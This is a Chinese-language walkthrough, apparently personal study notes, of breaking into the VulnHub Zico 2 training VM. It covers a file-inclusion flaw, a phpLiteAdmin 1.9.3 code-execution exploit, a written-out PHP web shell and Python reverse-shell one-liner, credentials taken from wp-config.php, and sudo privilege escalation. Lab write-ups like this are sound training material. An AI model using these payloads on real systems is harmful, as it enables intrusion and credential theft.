【vulnhub靶场】Zico 2靶机提权

#免责声明：
本文属于个人笔记，仅用于学习，禁止使用于任何违法行为，任何违法行为与本人无关。

Zico 2靶机

靶机下载地址 zico2: 1 ~ VulnHub

下载之后，本地解压，用VMware运行该虚拟机。

设置靶机 Zico 2 与攻击机网络环境，保证在同一局域网，方便都设置成net模式

主机发现与端口扫描

靶机MAC地址

nmap扫描 nmap -v -A 192.168.61.0/24

ip地址为192.168.61.144

开放了22、80、111端口

dirsearch目录扫描

web渗透

访问192.168.61.144

插件指纹识别

文件包含漏洞

首页点击

发现url处有page参数http://192.168.61.144/view.php?page=tools.html，可能存在文件包含漏洞

尝试查看/etc/passwd，呀呵，真有

访问/dbadmin/ 发现test_db.php是phpLiteAdmin v1.9.3的登陆页

尝试弱口令admin登录，好家伙进来了

info处找到可能是管理员root和普通用户zico的密码

653F4B285089453FE00E2AAFAC573414

96781A607F4E9F5F423AC01F0DAB0EBD

分别去md5解密：

34kroot34

zico2215@

刚刚注意到phpLiteAdmin版本为v1.9.3

百度下phpLiteAdmin漏洞，发现版本号小于等于1.9.3可能有代码执行漏洞

rce漏洞拿shell

去kali搜索该版本存在的漏洞

searchsploit phpLiteAdmin 1.9.3

下载24044.txt文件searchsploit -m 24044.txt

查看该文件

建一个名字叫 shell.php 的数据库

创建一个名叫 shell 的表

写入一句话木马 '<?php echo system($_GET["cmd"]); ?>'

结合文件包含漏洞，访问http://192.168.61.144/view.php?page=../../usr/databases/shell.php 访问成功

url拼接cmd=whoami成功执行命令

使用python反弹shell

url后拼接python命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.61.131",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

卡利开启8888监听

监听成功，使用命令显示当前路径

SHELL=/bin/bash script /dev/null

cd /home

cd wordpress

cat wp-config.php发现zico用户的密码sWfCsfJSPV9H3AmQzw8

拿到密码尝试ssh远程连接，连接成功

提权

sudo -l 查看有没有可利用的shell转义序列

利用sudo提权成功

---

靶场相关文章：Hack the Zico2 VM (CTF Challenge) - Hacking Articlesb